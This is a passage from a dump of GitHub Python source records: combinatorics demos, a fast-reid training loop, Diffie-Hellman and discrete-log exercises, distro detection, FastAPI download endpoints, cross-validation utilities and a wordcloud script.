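## Quick check (illustrative): permutations of n items taken r at a time\n## number n!/(n-r)!, so the call above yields 3!/0! = 6 orderings.\nassert len(result) == 6\n\n\n## Combination: choosing r distinct items out of n distinct items, ignoring order\n### 'ab' 'ac' 'bc'\n\nfrom itertools import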
combinations\ndata = ['a', 'b', 'c']\nresult = list(combinations(data, 2))\nprint(result)\n\n\n## Permutations with repetition\n\nfrom itertools import product\nresult = list(product(data, repeat = 2)) ## all permutations picking 2 items (repetition allowed)\nprint(result)\n\n\n\n## Combinations with repetition\nfrom itertools import combinations_with_replacement\nresult = list(combinations_with_replacement(data, 2)) ## all combinations picking 2 items (repetition allowed)\nprint(result)","repo_name":"yangwonhee/algorithm","sub_path":"dongbin/01_5.py","file_name":"01_5.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9483100325","text":"# encoding: utf-8\n\"\"\"\ncredit:\nhttps://github.com/facebookresearch/detectron2/blob/master/detectron2/engine/train_loop.py\n\"\"\"\n\nimport logging\nimport time\nimport weakref\nfrom typing import Dict\n\nimport numpy as np\nimport torch\nfrom torch.nn.parallel import DataParallel, DistributedDataParallel\n\nimport fastreid.utils.comm as comm\nfrom fastreid.utils.events import EventStorage, get_event_storage\nfrom fastreid.utils.params import ContiguousParams\n\n__all__ = [\"HookBase\", \"TrainerBase\", \"SimpleTrainer\"]\n\nlogger = logging.getLogger(__name__)\n\n\nclass HookBase:\n    \"\"\"\n    Base class for hooks that can be registered with :class:`TrainerBase`.\n    Each hook can implement 6 methods. The way they are called is demonstrated\n    in the following snippet:\n    .. code-block:: python\n        hook.before_train()\n        for _ in range(start_epoch, max_epoch):\n            hook.before_epoch()\n            for iter in range(start_iter, max_iter):\n                hook.before_step()\n                trainer.run_step()\n                hook.after_step()\n            hook.after_epoch()\n        hook.after_train()\n    Notes:\n        1. In the hook method, users can access `self.trainer` to access more\n           properties about the context (e.g., current iteration).\n        2. A hook that does something in :meth:`before_step` can often be\n           implemented equivalently in :meth:`after_step`.\n           If the hook takes non-trivial time, it is strongly recommended to\n           implement the hook in :meth:`after_step` instead of :meth:`before_step`.\n           The convention is that :meth:`before_step` should only take negligible time.\n           Following this convention will allow hooks that do care about the difference\n           between :meth:`before_step` and :meth:`after_step` (e.g., timer) to\n           function properly.\n
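    A minimal illustrative hook (a sketch, not a hook shipped with this\n    codebase) only needs to override the methods it cares about:\n    .. code-block:: python\n        class IterPrintHook(HookBase):\n            def after_step(self):\n                print(self.trainer.iter)\n    Attributes:\n        trainer: A weak reference to the trainer object.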
Set by the trainer when the hook is\n registered.\n \"\"\"\n\n def before_train(self):\n \"\"\"\n Called before the first iteration.\n \"\"\"\n pass\n\n def after_train(self):\n \"\"\"\n Called after the last iteration.\n \"\"\"\n pass\n\n def before_epoch(self):\n \"\"\"\n Called before each epoch.\n \"\"\"\n pass\n\n def after_epoch(self):\n \"\"\"\n Called after each epoch.\n \"\"\"\n pass\n\n def before_step(self):\n \"\"\"\n Called before each iteration.\n \"\"\"\n pass\n\n def after_step(self):\n \"\"\"\n Called after each iteration.\n \"\"\"\n pass\n\n\nclass TrainerBase:\n \"\"\"\n Base class for iterative trainer with hooks.\n The only assumption we made here is: the training runs in a loop.\n A subclass can implement what the loop is.\n We made no assumptions about the existence of dataloader, optimizer, model, etc.\n Attributes:\n iter(int): the current iteration.\n epoch(int): the current epoch.\n start_iter(int): The iteration to start with.\n By convention the minimum possible value is 0.\n max_epoch (int): The epoch to end training.\n storage(EventStorage): An EventStorage that's opened during the course of training.\n \"\"\"\n\n def __init__(self):\n self._hooks = []\n\n def register_hooks(self, hooks):\n \"\"\"\n Register hooks to the trainer. The hooks are executed in the order\n they are registered.\n Args:\n hooks (list[Optional[HookBase]]): list of hooks\n \"\"\"\n hooks = [h for h in hooks if h is not None]\n for h in hooks:\n assert isinstance(h, HookBase)\n # To avoid circular reference, hooks and trainer cannot own each other.\n # This normally does not matter, but will cause memory leak if the\n # involved objects contain __del__:\n # See http://engineering.hearsaysocial.com/2013/06/16/circular-references-in-python/\n h.trainer = weakref.proxy(self)\n self._hooks.extend(hooks)\n\n def train(self, start_epoch: int, max_epoch: int, iters_per_epoch: int):\n \"\"\"\n Args:\n start_epoch, max_epoch (int): See docs above\n \"\"\"\n logger = logging.getLogger(__name__)\n logger.info(\"Starting training from epoch {}\".format(start_epoch))\n\n self.iter = self.start_iter = start_epoch * iters_per_epoch\n\n with EventStorage(self.start_iter) as self.storage:\n try:\n self.before_train()\n for self.epoch in range(start_epoch, max_epoch):\n self.before_epoch()\n for _ in range(iters_per_epoch):\n self.before_step()\n self.run_step()\n self.after_step()\n self.iter += 1\n self.after_epoch()\n except Exception:\n logger.exception(\"Exception during training:\")\n raise\n finally:\n self.after_train()\n\n def before_train(self):\n for h in self._hooks:\n h.before_train()\n\n def after_train(self):\n self.storage.iter = self.iter\n for h in self._hooks:\n h.after_train()\n\n def before_epoch(self):\n self.storage.epoch = self.epoch\n\n for h in self._hooks:\n h.before_epoch()\n\n def before_step(self):\n self.storage.iter = self.iter\n\n for h in self._hooks:\n h.before_step()\n\n def after_step(self):\n for h in self._hooks:\n h.after_step()\n\n def after_epoch(self):\n for h in self._hooks:\n h.after_epoch()\n\n def run_step(self):\n raise NotImplementedError\n\n\nclass SimpleTrainer(TrainerBase):\n \"\"\"\n A simple trainer for the most common type of task:\n single-cost single-optimizer single-data-source iterative optimization.\n It assumes that every step, you:\n 1. Compute the loss with a data from the data_loader.\n 2. Compute the gradients with the above loss.\n 3. 
Update the model with the optimizer.\n    If you want to do anything fancier than this,\n    either subclass TrainerBase and implement your own `run_step`,\n    or write your own training loop.\n    \"\"\"\n\n    def __init__(self, model, data_loader, optimizer, param_wrapper):\n        \"\"\"\n        Args:\n            model: a torch Module. Takes a data from data_loader and returns a\n                dict of heads.\n            data_loader: an iterable. Contains data to be used to call model.\n            optimizer: a torch optimizer.\n        \"\"\"\n        super().__init__()\n\n        \"\"\"\n        We set the model to training mode in the trainer.\n        However it's valid to train a model that's in eval mode.\n        If you want your model (or a submodule of it) to behave\n        like evaluation during training, you can overwrite its train() method.\n        \"\"\"\n        model.train()\n\n        self.model = model\n        self.data_loader = data_loader\n        self._data_loader_iter = iter(data_loader)\n        self.optimizer = optimizer\n        self.param_wrapper = param_wrapper\n\n    def run_step(self):\n        \"\"\"\n        Implement the standard training logic described above.\n        \"\"\"\n        assert self.model.training, \"[SimpleTrainer] model was changed to eval mode!\"\n        start = time.perf_counter()\n        \"\"\"\n        If you want to do something with the data, you can wrap the dataloader.\n        \"\"\"\n        data = next(self._data_loader_iter)\n        data_time = time.perf_counter() - start\n\n        \"\"\"\n        If you want to do something with the heads, you can wrap the model.\n        \"\"\"\n\n        loss_dict = self.model(data)\n        losses = sum(loss_dict.values())\n\n        \"\"\"\n        If you need to accumulate gradients or something similar, you can\n        wrap the optimizer with your custom `zero_grad()` method.\n        \"\"\"\n        self.optimizer.zero_grad()\n\n        losses.backward()\n\n        self._write_metrics(loss_dict, data_time)\n\n        \"\"\"\n        If you need gradient clipping/scaling or other processing, you can\n        wrap the optimizer with your custom `step()` method.\n        \"\"\"\n        self.optimizer.step()\n        if isinstance(self.param_wrapper, ContiguousParams):\n            self.param_wrapper.assert_buffer_is_valid()\n\n    def _write_metrics(self, loss_dict: Dict[str, torch.Tensor], data_time: float):\n        \"\"\"\n        Args:\n            loss_dict (dict): dict of scalar losses\n            data_time (float): time taken by the dataloader iteration\n        \"\"\"\n        device = next(iter(loss_dict.values())).device\n\n        # Use a new stream so these ops don't wait for DDP or backward\n        with torch.cuda.stream(torch.cuda.Stream() if device.type == \"cuda\" else None):\n            metrics_dict = {k: v.detach().cpu().item() for k, v in loss_dict.items()}\n            metrics_dict[\"data_time\"] = data_time\n\n            # Gather metrics among all workers for logging\n            # This assumes we do DDP-style training, which is currently the only\n            # supported method in detectron2.\n            all_metrics_dict = comm.gather(metrics_dict)\n\n        if comm.is_main_process():\n            storage = get_event_storage()\n\n            # data_time among workers can have high variance.
The actual latency\n # caused by data_time is the maximum among workers.\n data_time = np.max([x.pop(\"data_time\") for x in all_metrics_dict])\n storage.put_scalar(\"data_time\", data_time)\n\n # average the rest metrics\n metrics_dict = {\n k: np.mean([x[k] for x in all_metrics_dict]) for k in all_metrics_dict[0].keys()\n }\n total_losses_reduced = sum(metrics_dict.values())\n if not np.isfinite(total_losses_reduced):\n raise FloatingPointError(\n f\"Loss became infinite or NaN at iteration={self.iter}!\\n\"\n f\"loss_dict = {metrics_dict}\"\n )\n\n storage.put_scalar(\"total_loss\", total_losses_reduced)\n if len(metrics_dict) > 1:\n storage.put_scalars(**metrics_dict)\n\n\nclass AMPTrainer(SimpleTrainer):\n \"\"\"\n Like :class:`SimpleTrainer`, but uses automatic mixed precision\n in the training loop.\n \"\"\"\n\n def __init__(self, model, data_loader, optimizer, param_wrapper, grad_scaler=None):\n \"\"\"\n\n Args:\n model, data_loader, optimizer: same as in :class:`SimpleTrainer`.\n grad_scaler: torch GradScaler to automatically scale gradients.\n \"\"\"\n unsupported = \"AMPTrainer does not support single-process multi-device training!\"\n if isinstance(model, DistributedDataParallel):\n assert not (model.device_ids and len(model.device_ids) > 1), unsupported\n assert not isinstance(model, DataParallel), unsupported\n\n super().__init__(model, data_loader, optimizer, param_wrapper)\n\n if grad_scaler is None:\n from torch.cuda.amp import GradScaler\n\n grad_scaler = GradScaler()\n self.grad_scaler = grad_scaler\n\n def run_step(self):\n \"\"\"\n Implement the AMP training logic.\n \"\"\"\n assert self.model.training, \"[AMPTrainer] model was changed to eval mode!\"\n assert torch.cuda.is_available(), \"[AMPTrainer] CUDA is required for AMP training!\"\n from torch.cuda.amp import autocast\n\n start = time.perf_counter()\n data = next(self._data_loader_iter)\n data_time = time.perf_counter() - start\n\n with autocast():\n loss_dict = self.model(data)\n losses = sum(loss_dict.values())\n\n self.optimizer.zero_grad()\n self.grad_scaler.scale(losses).backward()\n\n self._write_metrics(loss_dict, data_time)\n\n self.grad_scaler.step(self.optimizer)\n self.grad_scaler.update()\n if isinstance(self.param_wrapper, ContiguousParams):\n self.param_wrapper.assert_buffer_is_valid()\n","repo_name":"JDAI-CV/fast-reid","sub_path":"fastreid/engine/train_loop.py","file_name":"train_loop.py","file_ext":"py","file_size_in_byte":12011,"program_lang":"python","lang":"en","doc_type":"code","stars":3122,"dataset":"github-code","pt":"19"} +{"seq_id":"39461619882","text":"'''\nCool dynamic programming solution (memoization)\nJust grow the number of houses one at a time. 
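(A concrete trace: for nums = [2,7,9,3,1] the pair (p2, p1) steps through\n(0,2), (2,7), (7,11), (11,11), (11,12), so rob returns 12 = 2+9+1.)\n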
At each house record the max that can be stolen\n which is either the loot up to 2 houses ago + this house, or the loot up to past house - because of the adjacency requirement.\n\nGood reminder to shrink problems down then grow them up.\n'''\nclass Solution:\n def rob(self, nums):\n p1, p2 = 0,0\n for i in range(len(nums)):\n p2, p1 = p1, max(p1, p2 + nums[i])\n return p1\n\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n nums = [2,7,9,3,1]\n print(sol.rob(nums))","repo_name":"drewserles/LeetCodeChallenges","sub_path":"101-200/p198.py","file_name":"p198.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25456869083","text":"import os\nimport sys\n\nfrom PIL import Image\nfrom wordcloud import WordCloud\n\nfrom scripts.chord import Chord\n\npath = sys.argv[1]\n\nwith open(path, \"r\", encoding=\"utf8\") as f:\n raw = f.read()\n\ntext = []\nfor word in raw.split():\n word = word.strip()\n if Chord.is_chord(word):\n continue\n if word.startswith('['):\n continue\n text.append(word)\n\nfor i in range(10):\n text.append(os.path.splitext(os.path.basename(path))[0])\n\ntext = ' '.join(text).lower()\n\ntext = u\"\"\"Mezi nebem a zemí, přibližně v půli cesty,\nmezi magickou krajinou a dusivými městy;\nOdhalí se v pravou chvíli\nsamého vědomí hranice.\nA dá se po ní tiše přejít,\nskrz bílou linku ve světle měsíce\nradno je dobrých mravů dbáti, neboť stává se nejednou, \nže si vlídné Přízraky na kus řeči přisednou.\nSlušností je přivítat a nabídnout cigaretu, \npři tom vzácném prolnutí\njindy uzavřených světů.\nDo stromových domků vstoupit smí se \ni bez pozvání, \ntřeba je ale rozloučit se hbitě,\njakmile ozve se za zády klepání.\nNěkdy v brzkém odpoledni k procházce přizve lesní pěšina, \nběda však těm, kdo zapomenou, kde končí a kde začíná.\nStává se totiž nepozorným dobrodruhům, \nže zabloudí v mlze k vílám, \nvyhne se ale hříbky lemovaným kruhům, ten, komu je duše jeho milá;\nBytosti tajemného hvozdu omamnou melodii pějí, \nmísty znepokojivou, jako chvění prasklé struny\n\nV prazvláštním tichu okolí ty tóny dlouze znějí,\ntu nad hlavou, tu zas pod nohama zjevují se runy.\nNa kopci v místě čtyř živlů smíření\nse ve stínu kříže poodhalí Znamení,\nzjeví se kudlanka, můra či netopýr,\nzapsal jsem jejich poselství na papír;\nA jako důkaz na místě činu \nzanechám předmět doličný,\nobálku pod listím břečťanu \nkdesi v Šentvidu pri Stični\"\"\".lower()\n\nstopwords = {'z', 'o', 'a', 'v', 's', 'že', 'do', 'se', 'na', 've', 'nananana', 'ze'}\n\n# with open(\"C:/Users/Lamanchy/Downloads/stopwords-cs.txt\", \"r\", encoding='utf8') as f:\n# stopwords = set([i.strip() for i in f.readlines()])\n\nwordcloud = WordCloud(\n stopwords=stopwords,\n max_words=10000000,\n min_font_size=10,\n relative_scaling=0.1,\n min_word_length=2,\n normalize_plurals=False,\n repeat=True,\n width=int(105/25.4*300),\n height=int(148/25.4*300),\n collocations=True,\n include_numbers=True,\n # colormap=\"Pastel2\",\n font_path=\"C:/Users/Lamanchy/PycharmProjects/songbook/pil_quality_pdf/fonts/calibri.ttf\",\n).generate(text)\n\nwordcloud.to_file(\"test.png\")\nimg = Image.open('test.png')\nimg.show()\n\n# import matplotlib as mpl\n# import matplotlib.pyplot as plt\n#\n# def plot_colorMaps(cmap):\n#\n# fig, ax = plt.subplots(figsize=(4,0.4))\n# col_map = plt.get_cmap(cmap)\n# mpl.colorbar.ColorbarBase(ax, cmap=col_map, orientation = 'horizontal')\n#\n# plt.show()\n#\n#\n# for cmap_id in plt.colormaps():\n# print(cmap_id)\n# 
plot_colorMaps(cmap_id)\n\n# Pastel1 Pastel2 Wistia\n","repo_name":"lamanchy/songbook","sub_path":"show_wordcloud.py","file_name":"show_wordcloud.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"cs","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"41756864897","text":"import math\nfrom random import randint\n\n\ndef Exponentiation(a, x, p):\n    y = 1\n    while 0 < x:\n        if x % 2 == 1:\n            y = y * a % p\n        a = a * a % p\n        x //= 2\n    return y\n\n\ndef EuclidAlgorithm(a, b) -> object:\n    U = [a, 1, 0]\n    V = [b, 0, 1]\n    T = [0] * 3\n    while V[0] != 0:\n        q = U[0] // V[0]\n        T[0] = U[0] % V[0]\n        T[1] = U[1] - q * V[1]\n        T[2] = U[2] - q * V[2]\n        for i in range(3):\n            U[i] = V[i]\n            V[i] = T[i]\n    return U\n\n\ndef NOD(x, y):\n    if x > y:\n        x, y = y, x\n    while y != 0:\n        r = x % y\n        x = y\n        y = r\n    return x\n\n\ndef Ferma(x):\n    if x == 2:\n        return True\n    if x & 1 == 0:\n        return False\n    for i in range(100):\n        a = randint(0, 10 ** 9)\n        if NOD(a, x) != 1 or Exponentiation(a, x - 1, x) != 1:\n            return False\n    return True\n\n\ndef DiffieHellman():\n    while True:  # generation q\n        q = randint(0, 10 ** 9)\n        p = 2 * q + 1  # calculation P\n        if Ferma(q) and Ferma(p):  # check P and q for simplicity\n            break\n\n    while True:  # generation g\n        g = randint(0, 10 ** 9)\n        if 1 < g < p - 1 and Exponentiation(g, q, p) != 1:\n            break\n\n    Xa = randint(1, p)\n    Xb = randint(1, p)\n\n    Ya = Exponentiation(g, Xa, p)\n    Yb = Exponentiation(g, Xb, p)\n\n    Za = Exponentiation(Yb, Xa, p)\n    Zb = Exponentiation(Ya, Xb, p)\n    print(Za, \" == \", Zb)\n\n\ndef BabyStepGiantStep(p, a, y):\n    m = k = math.ceil(math.sqrt(p))\n    L1 = [0] * m\n    L2 = [0] * k\n    for i in range(m):\n        L1[i] = (Exponentiation(a, i, p) * Exponentiation(y, 1, p)) % p\n    for i in range(k):\n        L2[i] = Exponentiation(a, (i + 1) * m, p) % p\n\n    dictionary = dict()\n    for i in range(m):\n        dictionary[L1[i]] = i\n    for i in range(k):\n        if L2[i] in dictionary:\n            x = ((i + 1) * m) - (dictionary[L2[i]])\n            print(\"x = {:10d} ==> {:10d} == {:10d}\".format(x, y, Exponentiation(a, x, p)))\n            return\n\n\ndef main():\n    print(\"1. Exponentiation modulo:\")\n    print(\"expect: \", 5 ** 12 % 7, \"receive: \", Exponentiation(5, 12, 7))\n    print(\"expect: \", 2 ** 10 % 5, \"receive: \", Exponentiation(2, 10, 5))\n    print(\"-\" * 20)\n\n    print(\"2. Generalized Euclidean algorithm:\")\n    print(\"expect: [1, -2, 3] receive: \", EuclidAlgorithm(28, 19))\n    print(\"-\" * 20)\n\n    print(\"3. Building a shared key using the Diffie-Hellman scheme:\")\n    DiffieHellman()\n    print(\"-\" * 20)\n\n    print(\"4. Baby step, giant step:\")\n    BabyStepGiantStep(28406579, 21698472, 16312338)\n    print(\"-\" * 10)\n    BabyStepGiantStep(323605307, 229635193, 45162172)\n\n\nif __name__ == '__main__':\n    main()","repo_name":"zkhip/IS","sub_path":"src/diffie_hellman.py","file_name":"diffie_hellman.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21775367365","text":"# vim: set fileencoding=utf-8 :\n#\n# (C) 2010,2014 Guido Günther\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see <http://www.gnu.org/licenses/>.\n#\n\nimport logging\nimport os\nimport re\nimport subprocess\n\n\ntry:\n    import lsb_release\nexcept ImportError:\n    lsb_release = None\n\n\nclass Distro(object):\n    \"\"\"\n    A distribution\n\n    @cvar id: distro id as returned by lsb-release\n\n    @cvar service_blacklist: services that should never be restarted\n    @cvar service_blacklist_re: regex list of services that should\n        never be restarted\n    @cvar _pkg_services: A C{dict} that maps packages to services. In\n        case we find binaries that match a key in this hash restart\n        the services listed in values.\n    @cvar _pkg_service_blacklist: if we find binaries in the package\n        listed as key don't restart services listed in values\n    \"\"\"\n    id = None\n    service_blacklist = set()\n    service_blacklist_re = set()\n\n    _pkg_services = {}\n    _pkg_blacklist = {}\n    _pkg_service_blacklist = {}\n\n    @classmethod\n    def pkg(klass, name):\n        \"\"\"Return package object named name\"\"\"\n        raise NotImplementedError\n\n    @classmethod\n    def pkg_by_file(klass, path):\n        \"\"\"Return package object that contains path\"\"\"\n        raise NotImplementedError\n\n    @classmethod\n    def restart_service_cmd(klass, service):\n        \"\"\"Command to restart service\"\"\"\n        raise NotImplementedError\n\n    @classmethod\n    def restart_service(klass, service):\n        \"\"\"Restart a service\"\"\"\n        subprocess.call(klass.restart_service_cmd(service))\n\n    @classmethod\n    def is_service_installed(klass, service):\n        \"\"\"Check whether a service exists on the system\"\"\"\n        return True\n\n    @classmethod\n    def pkg_services(klass, pkg):\n        \"\"\"\n        List of services that package pkg needs restarted that aren't part\n        of pkg itself\n        \"\"\"\n        return [s for s in klass._pkg_services.get(pkg.name, [])\n                if klass.is_service_installed(s)]\n\n    @classmethod\n    def pkg_service_blacklist(klass, pkg):\n        \"\"\"\n        List of services in pkg that we don't want to be restarted even when\n        a binary from this package maps a shared lib that changed.\n        \"\"\"\n        return klass._pkg_service_blacklist.get(pkg.name, [])\n\n    def filter_services(self, services):\n        \"\"\"\n        Filter out services that match service_blacklist_re\n        \"\"\"\n        ret = []\n        matchers = [re.compile(b) for b in self.service_blacklist_re]\n        for s in services:\n            if not any([m.match(s) for m in matchers]):\n                ret.append(s)\n        return set(ret)\n\n    @classmethod\n    def has_apt(klass):\n        \"\"\"Does the distribution use apt\"\"\"\n        return False\n\n    @staticmethod\n    def detect():\n        return detect()\n\n\nimport whatmaps.debiandistro  # noqa: E402\nimport whatmaps.redhatdistro  # noqa: E402\n\n\ndef detect():\n    \"\"\"\n    Detect the distribution we run on.
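The lsb_release Python module is\n    consulted first, then the lsb_release binary, and finally a probe for\n    dpkg or rpm.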
Returns C{None} if the\n    distribution is unknown.\n    \"\"\"\n    id = None\n\n    if lsb_release:\n        id = lsb_release.get_distro_information()['ID']\n    else:\n        try:\n            lsb_cmd = subprocess.Popen(['lsb_release', '--id', '-s'],\n                                       stdout=subprocess.PIPE,\n                                       stderr=subprocess.DEVNULL)\n            output = lsb_cmd.communicate()[0]\n            if not lsb_cmd.returncode:\n                id = output.decode().split('\n')[0].strip()\n        except OSError:\n            # id is None in this case\n            pass\n\n    if id == whatmaps.debiandistro.DebianDistro.id:\n        return whatmaps.debiandistro.DebianDistro\n    elif id == whatmaps.redhatdistro.FedoraDistro.id:\n        return whatmaps.redhatdistro.FedoraDistro\n    else:\n        if os.path.exists('/usr/bin/dpkg'):\n            logging.warning(\"Unknown distro but dpkg found, assuming Debian\")\n            return whatmaps.debiandistro.DebianDistro\n        elif os.path.exists('/bin/rpm'):\n            logging.warning(\"Unknown distro but rpm found, assuming Fedora\")\n            return whatmaps.redhatdistro.FedoraDistro\n        else:\n            return None\n","repo_name":"agx/whatmaps","sub_path":"whatmaps/distro.py","file_name":"distro.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"41606789971","text":"from typing import Any, List\n\nfrom fastapi import APIRouter, Depends\n\nfrom app import schemas\nfrom app.chain.download import DownloadChain\nfrom app.core.security import verify_token\n\nrouter = APIRouter()\n\n\n@router.get(\"/\", summary=\"Downloading\", response_model=List[schemas.DownloadingTorrent])\nasync def read_downloading(\n        _: schemas.TokenPayload = Depends(verify_token)) -> Any:\n    \"\"\"\n    Query the tasks that are currently downloading\n    \"\"\"\n    return DownloadChain().downloading()\n\n\n@router.put(\"/{hashString}/start\", summary=\"Start task\", response_model=schemas.Response)\nasync def start_downloading(\n        hashString: str,\n        _: schemas.TokenPayload = Depends(verify_token)) -> Any:\n    \"\"\"\n    Start a download task\n    \"\"\"\n    ret = DownloadChain().set_downloading(hashString, \"start\")\n    return schemas.Response(success=True if ret else False)\n\n\n@router.put(\"/{hashString}/stop\", summary=\"Pause task\", response_model=schemas.Response)\nasync def stop_downloading(\n        hashString: str,\n        _: schemas.TokenPayload = Depends(verify_token)) -> Any:\n    \"\"\"\n    Pause a download task\n    \"\"\"\n    ret = DownloadChain().set_downloading(hashString, \"stop\")\n    return schemas.Response(success=True if ret else False)\n\n\n@router.delete(\"/{hashString}\", summary=\"Delete download task\", response_model=schemas.Response)\nasync def remove_downloading(\n        hashString: str,\n        _: schemas.TokenPayload = Depends(verify_token)) -> Any:\n    \"\"\"\n    Remove a download task\n    \"\"\"\n    ret = DownloadChain().remove_downloading(hashString)\n    return schemas.Response(success=True if ret else False)\n","repo_name":"abczi/MoviePilot","sub_path":"app/api/endpoints/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"44316400069","text":"import random\nfrom typing import Any\nfrom time import time\nimport pickle\nimport logging\n\nimport numpy as np\nimport pandas as pd\n\nfrom kfold import Kfold\nfrom metrics import (\n    get_confusion_matrix,\n    get_accuracy_score,\n    get_precision_score,\n    get_recall_score,\n    get_f1_score\n)\n\n\ndef get_random_combinations_of_parameters(\n    parameters: dict,\n    number_of_combinations: int\n) -> list[dict[Any, Any]]:\n    combinations = []\n    for _ in range(number_of_combinations):\n        combination = {}\n        for parameter, values in parameters.items():\n            combination[parameter] = random.choice(values)\n        combinations.append(combination)\n    return combinations\n\n\ndef get_best_parameters(\n    classifier: Any,\n    parameters_grid: dict[str, list[Any]],\n    numbers_of_folds: int,\n    number_of_parameters_combinations: int,\n    values: tuple[np.ndarray, np.ndarray]\n) -> tuple[dict[str, Any], pd.DataFrame]:\n    grid_results = []\n    parameters_combinations = get_random_combinations_of_parameters(\n        parameters_grid,\n        number_of_parameters_combinations\n    )\n    X, y = values\n    for combination in parameters_combinations:\n        tunning_kfold = Kfold(numbers_of_folds)\n        times = []\n        scores = []\n        for (\n            x_train_tunning,\n            x_test_tunning,\n            y_train_tunning,\n            y_test_tunning\n        ) in tunning_kfold.split(X, y):\n            initial_time = time()\n            cls = classifier(**combination)\n            cls.fit(x_train_tunning, y_train_tunning)\n            final_time = time()\n            times.append(final_time - initial_time)\n            predictions = cls.predict(x_test_tunning)\n            confusion_matrix = get_confusion_matrix(y_test_tunning, predictions)\n            score = get_f1_score(confusion_matrix.values)\n            scores.append(score)\n        mean_time = np.asarray(times).mean()\n        scores = np.asarray(scores)\n        mean_score = scores.mean()\n        std_score = scores.std()\n        grid_results.append(\n            dict(combination, f1_mean_score=mean_score, f1_std_score=std_score, mean_time=mean_time)\n        )\n    grid_results = pd.DataFrame(grid_results).\\\n        sort_values(by=[\"f1_mean_score\"], ascending=False).\\\n        reset_index(drop=True)\n\n
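    # The trailing three columns of grid_results are f1_mean_score,\n    # f1_std_score and mean_time; the leading columns are the sampled\n    # hyper-parameter combination itself, so slicing them off recovers\n    # the winning parameter dict.\n    best_parameters = 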
grid_results.iloc[:, :-3].to_dict(\"records\")[0]\n\n    return best_parameters, grid_results\n\n\ndef run_cross_validation(\n    classifier: Any,\n    classifier_name: str,\n    parameters_grid: dict[str, Any],\n    number_of_parameters_combinations: int,\n    numbers_of_folds: int,\n    values: tuple[np.ndarray, np.ndarray]\n) -> pd.DataFrame:\n    validation_kfold = Kfold(k=numbers_of_folds)\n    X, y = values\n    results = []\n    for index_fold, (\n        x_train_validation,\n        x_test_validation,\n        y_train_validation,\n        y_test_validation\n    ) in enumerate(validation_kfold.split(X, y)):\n        best_parameters, tunning_results = get_best_parameters(\n            classifier=classifier,\n            parameters_grid=parameters_grid,\n            numbers_of_folds=numbers_of_folds-1,\n            number_of_parameters_combinations=number_of_parameters_combinations,\n            values=(x_train_validation, y_train_validation)\n        )\n        tunning_results.to_csv(f\"../data/results/{classifier_name}/tunning/fold_{index_fold}.csv\")\n\n        cls = classifier(**best_parameters)\n        cls.fit(x_train_validation, y_train_validation)\n\n        train_predictions = cls.predict(x_train_validation)\n        train_confusion_matrix = get_confusion_matrix(y_train_validation, train_predictions).values\n        \n        train_accuracy = get_accuracy_score(train_confusion_matrix)\n        train_precision = get_precision_score(train_confusion_matrix)\n        train_recall = get_recall_score(train_confusion_matrix)\n        train_f1_score = get_f1_score(train_confusion_matrix)\n\n        validation_predictions = cls.predict(x_test_validation)\n        validation_confusion_matrix = get_confusion_matrix(y_test_validation, validation_predictions).values\n        validation_accuracy = get_accuracy_score(validation_confusion_matrix)\n        validation_precision = get_precision_score(validation_confusion_matrix)\n        validation_recall = get_recall_score(validation_confusion_matrix)\n        validation_f1_score = get_f1_score(validation_confusion_matrix)\n        \n        results.append(\n            {\n                \"classifier\": cls,\n                \"tuned_parameters\": str(best_parameters),\n                \"tunning_mean_score\": tunning_results.values[0][3],\n                \"tunning_std_score\": tunning_results.values[0][4],\n                \"train_accuracy\": train_accuracy,\n                \"train_precision\": train_precision,\n                \"train_recall\": train_recall,\n                \"train_f1_score\": train_f1_score,\n                \n                \"validation_accuracy\": validation_accuracy,\n                \"validation_precision\": validation_precision,\n                \"validation_recall\": validation_recall,\n                \"validation_f1_score\": validation_f1_score\n            }\n        )\n\n    return pd.DataFrame(results).\\\n        sort_values(by=\"validation_f1_score\", ascending=False).\\\n        reset_index(drop=True)\n","repo_name":"rjribeiro/machine_learning","sub_path":"k_fold/src/cross_validation.py","file_name":"cross_validation.py","file_ext":"py","file_size_in_byte":5331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18210377778","text":"import random\n\n# Predefined values for the keys and values\nkeys_list = [\"apple\", \"banana\", \"cherry\", \"watermellon\", \"pineapple\"]\nvalues_list = [random.randint(1, 15) for _ in keys_list]\n\n# Build a dictionary from the two lists\nmy_dict = dict(zip(keys_list, values_list))\n\nprint(\"Dictionary:\", my_dict)\n","repo_name":"qwaxa/Python_Lab","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20289371008","text":"#!/usr/bin/env python\n\nimport datetime\nfrom mock import patch\n\ntry:\n    import unittest2 as unittest\nexcept ImportError:\n    import unittest\n\nimport
